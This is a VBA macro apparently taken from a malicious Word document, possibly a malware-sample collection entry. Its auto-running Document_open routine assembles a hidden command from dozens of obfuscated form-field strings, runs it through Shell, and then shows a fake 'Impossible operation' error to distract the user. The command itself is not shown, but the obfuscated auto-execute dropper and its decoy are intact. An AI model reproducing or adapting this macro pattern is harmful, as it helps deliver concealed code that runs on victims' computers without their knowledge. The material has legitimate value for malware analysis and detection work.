Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Private Sub document_open()

calculation.axiate_Acheeky = calculation.encephalomalacosis_Apsychographically + calculation.shackle_Alogily + calculation.haglin_Adoddard

calculation.sparids_Agidgea = calculation.isospin_Achaises + calculation.critch_Agalipot + calculation.fiddle_Azinebs

calculation.lunary_Aswaged = calculation.lekach_Avetanda + calculation.bomber_Aempexa + calculation.ennuyee_Aunpreposterousness

calculation.teepees_Adoyley = calculation.judaica_Afinlet + calculation.minimal_Awhereso + calculation.vialful_Aturret

calculation.radion_Ascarts = calculation.nondeaf_Aredyes + calculation.nonpromiscuously_Ajewelly + calculation.myopes_Alidding

calculation.korrel_Auncased = calculation.pseudonymousness_Aindiscrimanently + calculation.daudit_Aboarded + calculation.mycosin_Anaresh

calculation.swollen_Aheaumes = calculation.tonger_Aloxing + calculation.amenite_Apremillennialize + calculation.redeye_Atotemic

calculation.bummel_Alambes = calculation.spunky_Abushmen + calculation.nizamut_Ayawping + calculation.retrad_Acitoyen

calculation.argufy_Ahorror = calculation.bullpen_Atabled + calculation.azoths_Apunjabi + calculation.daikers_Adayfly

calculation.mirate_Ashelah = calculation.helmets_Abaisakh + calculation.kidded_Aatangle + calculation.tsatlee_Acullage

calculation.houris_Atrefoil = calculation.zoners_Ashmoes + calculation.unmaned_Amongoyo + calculation.utricle_Aunname

calculation.triable_Agasking = calculation.setuid_Anudity + calculation.embrase_Aovergesticulation + calculation.petkins_Agravid

calculation.bureaux_Areamuse = calculation.sumdum_Aparish + calculation.escheat_Anonpantheistical + calculation.ibsenic_Aemoted

calculation.magmata_Akeelage = calculation.nonexcommunicable_Ahearse + calculation.affines_Ayearned + calculation.silvan_Avelamen

calculation.peptohydrochloric_Agurglet = calculation.lecturn_Abillet + calculation.durene_Asouthwesternmost + calculation.orgiasm_Astrowd

calculation.huskies_Aachter = calculation.keloid_Asurveys + calculation.pseudoperipteros_Aclosing + calculation.thraves_Adrinky

calculation.badman_Aoculus = calculation.foliate_Ashinier + calculation.fronded_Adaised + calculation.houris_Achlamydobacteriaceae

calculation.talose_Ajoropos = calculation.superinfluencing_Ascrunty + calculation.shandy_Aslalom + calculation.turners_Aspectrobolometer

calculation.chymia_Apseudosacrilegiously = calculation.ipseand_Aclayed + calculation.ototoi_Acalinda + calculation.pecked_Aaculeus

calculation.nilgais_Arooked = calculation.tinged_Alanific + calculation.subrule_Ahuddler + calculation.jainism_Ahopbine

calculation.tekedye_Abylines = calculation.aecium_Aunappreciatively + calculation.desires_Aspruer + calculation.decalog_Astruma

calculation.deduced_Amouldy = calculation.nonceremoniousness_Aaeonist + calculation.hepatophlebotomy_Apaleographically + calculation.introspectionist_Adisproportionally

calculation.outsert_Aholdman = calculation.hoaming_Adolerin + calculation.metallographically_Akamiks + calculation.spandy_Aneurohypophyseal

calculation.headset_Aunbesot = calculation.psychophysiology_Aecphory + calculation.ennomic_Apreaccommodation + calculation.youngth_Aspaddle

calculation.piqueur_Achanco = calculation.fliest_Aoutwell + calculation.undiscriminative_Auntroublesomeness + calculation.towable_Atertio

calculation.forwalk_Anebuly = calculation.samish_Aoutwile + calculation.sonars_Apyrogen + calculation.rheums_Acapsulolenticular

calculation.whatten_Aaurums = calculation.laggar_Aanilino + calculation.obviate_Alophiid + calculation.mayfair_Ahydroxycorticosterone

calculation.bowyang_Aunpeel = calculation.mocked_Araucous + calculation.zaptiah_Aenflame + calculation.roentgenological_Aecoute

calculation.wicker_Awetback = calculation.affere_Avandyke + calculation.aucuba_Ahypertrophyphied + calculation.skeily_Aistles

calculation.comings_Aachras = calculation.jotunn_Aspurtle + calculation.enwomb_Availed + calculation.pseudocollegiate_Ajudice

calculation.sturine_Awhitish = calculation.electropathology_Acayman + calculation.referee_Aabdest + calculation.embole_Arincon

calculation.spumes_Ailysia = calculation.berinse_Aeslisor + calculation.yvonne_Aasport + calculation.isomere_Aquerele

calculation.society_Amethene = calculation.tubfuls_Apoised + calculation.botone_Awambled + calculation.ciliary_Amallets

calculation.pseudoprofessional_Anatrium = calculation.unproportionedly_Aleelang + calculation.cantara_Alotium + calculation.spinals_Azonurus

calculation.cattily_Acomices = calculation.swabby_Abyrlady + calculation.superindependently_Atrifoil + calculation.salina_Alongeve

calculation.snaker_Asnowcap = calculation.lustred_Apeeper + calculation.ginnle_Aalerts + calculation.gemmary_Atupelos

calculation.vitesse_Aturfier = calculation.pseudocommissure_Aenleaf + calculation.amlikar_Astorge + calculation.housers_Afissile

calculation.twelfth_Aptoses = calculation.lustier_Abogans + calculation.chessel_Atomial + calculation.tritetartemorion_Achoriso



calculation.outbrag_Aoutwing = calculation.axiate_Acheeky + calculation.sparids_Agidgea

calculation.emulant_Aangule = calculation.lunary_Aswaged + calculation.teepees_Adoyley + calculation.radion_Ascarts

calculation.adempt_Aoblated = calculation.korrel_Auncased + calculation.swollen_Aheaumes + calculation.bummel_Alambes

calculation.unpaved_Aboletes = calculation.argufy_Ahorror + calculation.mirate_Ashelah + calculation.houris_Atrefoil

calculation.debugs_Abawties = calculation.triable_Agasking + calculation.bureaux_Areamuse + calculation.magmata_Akeelage

calculation.reddles_Acowards = calculation.peptohydrochloric_Agurglet + calculation.huskies_Aachter + calculation.badman_Aoculus

calculation.preimpressionist_Agenetta = calculation.talose_Ajoropos + calculation.chymia_Apseudosacrilegiously + calculation.nilgais_Arooked

calculation.rhaphes_Aoverdignifiedness = calculation.tekedye_Abylines + calculation.deduced_Amouldy + calculation.outsert_Aholdman

calculation.nonretentiveness_Aforold = calculation.headset_Aunbesot + calculation.piqueur_Achanco + calculation.forwalk_Anebuly

calculation.tontine_Apostmillennialism = calculation.whatten_Aaurums + calculation.bowyang_Aunpeel + calculation.wicker_Awetback

calculation.dungon_Adiluvia = calculation.comings_Aachras + calculation.sturine_Awhitish + calculation.spumes_Ailysia

calculation.ciboria_Abearers = calculation.society_Amethene + calculation.pseudoprofessional_Anatrium + calculation.cattily_Acomices

calculation.lungee_Abarbeau = calculation.snaker_Asnowcap + calculation.vitesse_Aturfier + calculation.twelfth_Aptoses

calculation.enjail_Afanner = calculation.enjail_Afanner




'quemado_Ababuina
'trendel_Abacauan
'pseudoorientally_Atorulus
'nonhallucinatory_Aondule
'sorose_Awadies
'pandion_Afulmine

calculation.concur_Avenusty = calculation.outbrag_Aoutwing + calculation.emulant_Aangule + calculation.adempt_Aoblated + calculation.unpaved_Aboletes + calculation.debugs_Abawties + calculation.reddles_Acowards + calculation.preimpressionist_Agenetta + calculation.rhaphes_Aoverdignifiedness + calculation.nonretentiveness_Aforold + calculation.tontine_Apostmillennialism + calculation.dungon_Adiluvia + calculation.ciboria_Abearers + calculation.lungee_Abarbeau + calculation.enjail_Afanner


Shell# calculation.concur_Avenusty, nonreprehensibly_Asensoriglandular


MsgBox "Impossible operation"
End Sub

Attribute VB_Name = "calculation"
Attribute VB_Base = "0{20081C7E-F815-4AAD-8F44-7C7E7BCB6D8D}{7A18283B-8CA0-4877-B97D-5878D99AACE4}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


INQUEST-PP=macro
